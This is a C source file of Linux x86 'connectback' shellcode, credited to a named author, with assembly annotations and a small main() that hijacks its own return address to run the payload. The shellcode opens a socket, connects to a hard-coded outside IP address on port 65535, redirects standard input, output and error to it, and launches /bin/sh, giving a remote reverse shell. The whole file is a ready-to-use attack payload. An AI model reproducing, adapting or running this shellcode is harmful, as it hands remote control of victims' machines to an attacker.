/*
 * connectback, execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "connectback execve /bin/sh /bin/sh 0 to port 65535"

#include <stdio.h>

char shellcode[] =    

/* socket */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x45\x10"			// mov    %eax,0x10(%ebp)
"\x40"				// inc    %eax
"\x89\xc3"			// mov    %eax,%ebx
"\x89\x45\x0c"			// mov    %eax,0xc(%ebp)
"\x40"				// inc    %eax
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x8d\x4d\x08"			// lea    0x8(%ebp),%ecx
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* connect */
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x43"				// inc    %ebx
"\x89\x5d\x14"			// mov    %ebx,0x14(%ebp)
"\x43"				// inc    %ebx
"\x66\xc7\x45\x16\xff\xff"	// movw   $0xffff,0x16(%ebp) (port: 65535 -> 0xffff)
"\xc7\x45\x18\xc6\x51\x81\x64"	// movl   $0x648151c6,0x18(%ebp) (ip: 198.81.129.100 -> hex value: 0x648151c6)
"\x8d\x55\x14"			// lea    0x14(%ebp),%edx
"\x89\x55\x0c"			// mov    %edx,0xc(%ebp)
"\xc6\x45\x10\x10"		// movb   $0x10,0x10(%ebp)
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x31\xc9"			// xor    %ecx,%ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* jump to G2C */
"\xeb\x1a"			// jmp    80480e9 <G2C>

/* start <shellcode> */
/* execve /bin/sh */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x07"			// mov    %al,0x7(%esi)
"\x8d\x1e"			// lea    (%esi),%ebx
"\x89\x5e\x08"			// mov    %ebx,0x8(%esi)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)
"\xb0\x0b"			// mov    $0xb,%al
"\x89\xf3"			// mov    %esi,%ebx
"\x8d\x4e\x08"			// lea    0x8(%esi),%ecx
"\x8d\x56\x0c"			// lea    0xc(%esi),%edx
"\xcd\x80"			// int    $0x80

/* G2C */
"\xe8\xe1\xff\xff\xff"		// call   80480cf <shellcode>
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    804815d <G2C+0x74>
"\x54"				// push   %esp
"\x52"				// push   %edx
"\x4f"				// dec    %edi
"\x45"				// inc    %ebp
"\x50"				// push   %eax
"\x4a"				// dec    %edx
"\x55"				// push   %ebp
"\x48"				// dec    %eax
"\x53"				// push   %ebx
;

int
main()
{
	int *ret;
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	printf("Shellcode length = %d\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}